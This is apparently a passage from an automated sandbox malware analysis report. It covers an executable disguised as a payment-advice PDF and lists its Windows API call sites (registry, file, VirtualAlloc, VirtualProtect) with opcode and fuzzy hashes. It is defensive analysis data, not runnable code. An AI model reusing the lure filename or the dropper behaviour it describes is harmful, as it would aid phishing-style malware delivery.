                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Enum$CloseOpenValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 167947723-0
                                                                                                                • Opcode ID: 42b2dd53c8b5802947a3dab0b58a0a50b760338acaf8adbf9a4fd88f57d55a7c
                                                                                                                • Instruction ID: caa0a88e983a87845293d3a09aded013c5498a2120ee6ea3f3930af667db2d56
                                                                                                                • Opcode Fuzzy Hash: 42b2dd53c8b5802947a3dab0b58a0a50b760338acaf8adbf9a4fd88f57d55a7c
                                                                                                                • Instruction Fuzzy Hash: 9FF08171A00204ABEB209F65DE8CABF767CEF80354B10803FF405B61D0DAB84D419B69
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,0000048C,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 0040245B
                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsv30DA.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3677997916-0
                                                                                                                • Opcode ID: 684252ed4cb5f75002efccf4c3d89688e5a32529c12b8521bce5fdd085325f04
                                                                                                                • Instruction ID: 28617f4b1a8802b5017de0243b5a45cf97da40b04a50325282b533cdbf166070
                                                                                                                • Opcode Fuzzy Hash: 684252ed4cb5f75002efccf4c3d89688e5a32529c12b8521bce5fdd085325f04
                                                                                                                • Instruction Fuzzy Hash: 64115E31911205EBDB14CFA4DA489AEB7B4EF44354B20843FE446B72D0DAB89A41EB59
                                                                                                                APIs
                                                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3850602802-0
                                                                                                                • Opcode ID: 71800ff5d752955c4261f1e4e44e66a702dae3e8c0882f1cfb99089304b670a7
                                                                                                                • Instruction ID: cd3aabbb77ee63ed71f9921c47df44d3aa6e588553b0b950a072bc92d791a3e5
                                                                                                                • Opcode Fuzzy Hash: 71800ff5d752955c4261f1e4e44e66a702dae3e8c0882f1cfb99089304b670a7
                                                                                                                • Instruction Fuzzy Hash: 2101F4316202209FE7095B389D05B6A3698E710319F10863FF851F62F1DA78DC428B4C
                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                  • Part of subcall function 004063BF: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                                  • Part of subcall function 004063BF: wsprintfW.USER32 ref: 00406411
                                                                                                                  • Part of subcall function 004063BF: LoadLibraryW.KERNELBASE(?), ref: 00406421
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 2547128583-0
                                                                                                                • Opcode ID: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
                                                                                                                • Instruction ID: 5d7b52194fecd52e31197542c52f699420a2dcfb6f4997f05ddeecd74f4f3bdc
                                                                                                                • Opcode Fuzzy Hash: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
                                                                                                                • Instruction Fuzzy Hash: 70E0863660422066D61057705E44D3763AC9E94704306043EFA46F2041DB78DC32AA6E
                                                                                                                APIs
                                                                                                                • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 00401DFD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$EnableShow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1136574915-0
                                                                                                                • Opcode ID: bfed12c821a079857a615332bdb98fb1c84882728095731f13ed5530d444e0e9
                                                                                                                • Instruction ID: 46dfe73b81ae29a5099323896a5bc3e3d9df575198e3285abdeb67f25c429c8d
                                                                                                                • Opcode Fuzzy Hash: bfed12c821a079857a615332bdb98fb1c84882728095731f13ed5530d444e0e9
                                                                                                                • Instruction Fuzzy Hash: 76E08C326005009BCB10AFB5AA4999D3375DF90369710007BE402F10E1CABC9C409A2D
                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$AttributesCreate
                                                                                                                • String ID:
                                                                                                                • API String ID: 415043291-0
                                                                                                                • Opcode ID: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                                                • Instruction ID: a29eaa7254a97888a18cbfd792fe15e84c6d283973f4e4682f27fdddc38ff468
                                                                                                                • Opcode Fuzzy Hash: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                                                • Instruction Fuzzy Hash: 71D09E71654601AFEF098F20DE16F2E7AA2FB84B00F11562CB682940E0DAB158199B15
                                                                                                                APIs
                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,00403293,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405706
                                                                                                                • GetLastError.KERNEL32 ref: 00405714
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateDirectoryErrorLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 1375471231-0
                                                                                                                • Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                                                                • Instruction ID: 3f205c5890689a668e8791f8cf6ed098ce3dcc56284ebb1818e0a19aeae2b5ff
                                                                                                                • Opcode Fuzzy Hash: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                                                                • Instruction Fuzzy Hash: DBC04C30225602DADA106F34DE087177951AB90741F1184396146E61A0DA348415E93D
                                                                                                                APIs
                                                                                                                • VirtualAlloc.KERNELBASE(00000000), ref: 10002963
                                                                                                                • GetLastError.KERNEL32 ref: 10002A6A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2087077646.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2087060697.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2087092633.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2087106563.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_10000000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocErrorLastVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 497505419-0
                                                                                                                • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                                • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                                                                                • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                                • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                                                                                APIs
                                                                                                                • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004027A0
                                                                                                                  • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FilePointerwsprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 327478801-0
                                                                                                                • Opcode ID: 625ba8c0adf551b09f916d27f71fdaae1f0ecd84ce04db3249cbe24fae782c82
                                                                                                                • Instruction ID: c5c3fa32fc6d0159c61c67e46e8878479b4609e7a69e49ca0ebb3ecbbe822ed2
                                                                                                                • Opcode Fuzzy Hash: 625ba8c0adf551b09f916d27f71fdaae1f0ecd84ce04db3249cbe24fae782c82
                                                                                                                • Instruction Fuzzy Hash: A0E04F71702514EFDB01AFA59E4ACAFBB6AEB40328B14443BF501F00E1DA7D8C019A2D
                                                                                                                APIs
                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfileStringWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 390214022-0
                                                                                                                • Opcode ID: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
                                                                                                                • Instruction ID: 9c0f32427e9d9ad9a827debec1b0d32512713181f08a0e22f3c826aa7fb996c6
                                                                                                                • Opcode Fuzzy Hash: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
                                                                                                                • Instruction Fuzzy Hash: 90E04F319001246ADB113EF10E8ED7F31695B40314B1405BFB551B66C6D9FC0D4246A9
                                                                                                                APIs
                                                                                                                • RegOpenKeyExW.KERNELBASE(00000000,0000048C,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Open
                                                                                                                • String ID:
                                                                                                                • API String ID: 71445658-0
                                                                                                                • Opcode ID: e61a0d233959cf951fd8dee32620159f1f5f2b0e63671ee31e14641033e06cac
                                                                                                                • Instruction ID: 180cb462b76767e938a43b2c67eaf1f9418a6812eb156052446fd1a81c43fca4
                                                                                                                • Opcode Fuzzy Hash: e61a0d233959cf951fd8dee32620159f1f5f2b0e63671ee31e14641033e06cac
                                                                                                                • Instruction Fuzzy Hash: 54E0BF76154108AFDB00DFA5EE46EA977ECAB44704F044025BA09E7191C674E5509768
                                                                                                                APIs
                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040320B,00000000,00416A20,000000FF,00416A20,000000FF,000000FF,00000004,00000000), ref: 00405CF0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 3934441357-0
                                                                                                                • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                                • Instruction ID: d2761c75b63c3b5a1b4cb2cfb4b6a55fbed1fd27b7f8bdfe76624f6b99830631
                                                                                                                • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                                • Instruction Fuzzy Hash: 2AE0EC3221425AABDF109E55EC08FEB7B6CEF05360F049437FA55E7190D631E921DBA4
                                                                                                                APIs
                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403255,00000000,00000000,00403079,000000FF,00000004,00000000,00000000,00000000), ref: 00405CC1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 2738559852-0
                                                                                                                • Opcode ID: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                                                                • Instruction ID: 881bd9ca443264ea0180802fa9c86a3c9bfb0e6b132b989af4612487e9445b73
                                                                                                                • Opcode Fuzzy Hash: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                                                                • Instruction Fuzzy Hash: D1E08632104259ABDF105E518C00AEB376CFB04361F104432F911E3140D630E8119FB4
                                                                                                                APIs
                                                                                                                • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2087077646.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2087060697.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2087092633.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2087106563.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_10000000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProtectVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 544645111-0
                                                                                                                • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                                                                                • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                                                                                APIs
                                                                                                                • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 3188754299-0
                                                                                                                • Opcode ID: 9f81f92dad3f7a811467f01a8cf18fc77b7af2f5e37f886534bc513ef1489464
                                                                                                                • Instruction ID: 4fb9e9dd77d4d4fa14caa6284e3e33111a790732df8c0ecbc47c365062d5febc
